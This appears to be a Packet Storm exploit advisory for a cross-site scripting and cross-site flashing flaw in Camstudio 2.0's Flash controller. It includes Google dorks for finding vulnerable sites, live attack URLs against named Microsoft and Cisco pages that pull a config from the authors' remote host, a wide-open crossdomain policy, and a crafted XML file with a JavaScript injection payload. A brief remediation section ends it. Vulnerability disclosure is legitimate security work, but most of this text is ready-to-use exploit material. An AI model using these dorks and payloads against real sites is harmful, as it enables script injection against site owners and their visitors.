exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Camstudio 2.0 XSS / XSF / Content Forgery

Camstudio 2.0 XSS / XSF / Content Forgery
Posted Jun 14, 2017
Authored by Project Insecurity, MLT | Site insecurity.zone

Camstudio version 2.0 suffers from cross site scripting and cross site flashing vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | 3e5d7f60ff82000a0a8db9caace4dd48e2b13569296c8180aa9336a8f892ee04

Camstudio 2.0 XSS / XSF / Content Forgery

Change Mirror Download
           ______  ______   _____     ___   _____   _____   _____              
| ___ \ | ___ \ | _ | |_ | | ___| / __ \ |_ _|
| |_/ / | |_/ / | | | | | | | |__ | / \/ | |
| __/ | / | | | | | | | __| | | | |
| | | |\ \ \ \_/ / /\__/ / | |___ | \__/\ | |
\_| \_| \_| \___/ \____/ \____/ \____/ \_/


_____ _ _ _____ _____ _____ _ _ ______ _____ _____ __ __
|_ _| | \ | | / ___| | ___| / __ \ | | | | | ___ \ |_ _| |_ _| \ \ / /
| | | \| | \ `--. | |__ | / \/ | | | | | |_/ / | | | | \ V /
| | | . ` | `--. \ | __| | | | | | | | / | | | | \ /
_| |_ | |\ | /\__/ / | |___ | \__/\ | |_| | | |\ \ _| |_ | | | |
\___/ \_| \_/ \____/ \____/ \____/ \___/ \_| \_| \___/ \_/ \_/


[+]---------------------------------------------------------[+]
| Vulnerable Software: Camstudio 2.0 |
| Vendor: https://camstudio.org |
| Vulnerability Type: XSS, XSF, Content Forgery |
| Date Released: 2017 |
| Released by: MLT (@ret2libc) |
[+]---------------------------------------------------------[+]

There is a cross-site-scripting / cross-site-flashing vulnerability affecting Camstudio. It can allow an
attacker to inject malicious SWF's into the vulnerable site in addition to having a use for content forgery and
cross site scripting. Depending on the version of flash player in use by the victim, XSS via a malicious SWF may
or may not be possible. In the case that it is not possible, an attacker can still inject javascript via CDATA
although this requires additional user interaction. externalInterface.call can also be abused here for callback
functionality.

Vulnerable sites include: Microsoft, US Army, Cisco, Fedex, Bank of America, HP, Intel, Dell, Samsung and more.
Almost quarter of a million sites in total are using this vulnerable software.

To find sites that are vulnerable to this, the following Google dorks can be used:
inurl:csConfigFile= filetype:swf
inurl:controller filetype:swf

the 'csConfigFile' HTTP GET paramater is the vulnerable param. Here is a live example of the vulnerability:
https://www.microsoft.com/latam/Office/solutions/demos/ministerio/DemoMTrans_controller.swf?csConfigFile=//zeroday.insecurity.zone/camtasia.xml
http://www.cisco.com/web/KR/events/webcast/video/controller.swf?csConfigFile=//zeroday.insecurity.zone/camtasia.xml

The URL's above show you how a malicious SWF can be loaded from a remote source (this can be used to execute javascript).
To execute the javascript, just click on the informtation box then click where it says 'click me'

In order to exploit this vulnerability, the attacker must have a correctly configured crossdomain policy
running on the same server that they are hosting the malicious XML file. Here is an example crossdomain policy:
-------------------------------------------------------------------------------------------------------------
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" secure="false"/>
<allow-http-request-headers-from domain="*" headers="*" secure="false"/>
</cross-domain-policy>
-------------------------------------------------------------------------------------------------------------

In addition to their crossdomain policy, an attacker must make a specially crafted XML file with some injected HTML via
Character Data (![CDATA[]]) - In the case that an older version of flash player is used, then it isn't necessary to do
this via CDATA but it can be instead be done via loading a malicious SWF (containing the JS to be executed) from a remote
source. Here is an example of what an attackers crafted XML file would look like:

-------------------------------------------------------------------------------------------------------------
<config>
<AutoStart>1</AutoStart>
<MovieWidth>640</MovieWidth>
<MovieHeight>460</MovieHeight>
<BackgroundColor>FFFFFF</BackgroundColor>
<MovieURL>paydotgov-demo.swf</MovieURL>
<ShowLoadingMov>0</ShowLoadingMov>
<LoadingMovURL></LoadingMovURL>
<ScaleLoadingMov>1</ScaleLoadingMov>
<LoadingMovPercentToLoad>50</LoadingMovPercentToLoad>
<LoadingMovMinDuration>3</LoadingMovMinDuration>
<ControllerColor>C0C0C0</ControllerColor>
<ShowFFRW>1</ShowFFRW>
<ShowAbout>1</ShowAbout>
<AboutBoxText><![CDATA[<a href=javascript:alert(document.domain)>Click me</a>]]> </AboutBoxText>
<TimeDisplayFormat>MM:SS</TimeDisplayFormat>
<ShowDuration>1</ShowDuration>
<ShowElapsedTime>1</ShowElapsedTime>
<TimeDisplayFont>Arial</TimeDisplayFont>
<TimeDisplayFontColor>000000</TimeDisplayFontColor>
</config>
-------------------------------------------------------------------------------------------------------------

For an attacker to call exterenalInterface.call, this can be done by loading the values in <MovieURL> within their
malicious XML file

How to fix:

In order to fix this, system administrators should be performing proper input sanatization although this can be
mitigated without doing so (I'd suggest performing input sanatization anyway as the underlying issue will still
remain if you opt for a quick fix) - Simply correct your site's crossdomain policy to disallow script access from
remote domains.

[+]---------------------------------------------------------[+]
| CONTACT US: |
| |
| IRC: irc.insecurity.zone (6667/6697) #insecurity |
| Twitter: @insecurity |
| Website: insecurity.zone |
[+]---------------------------------------------------------[+]
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close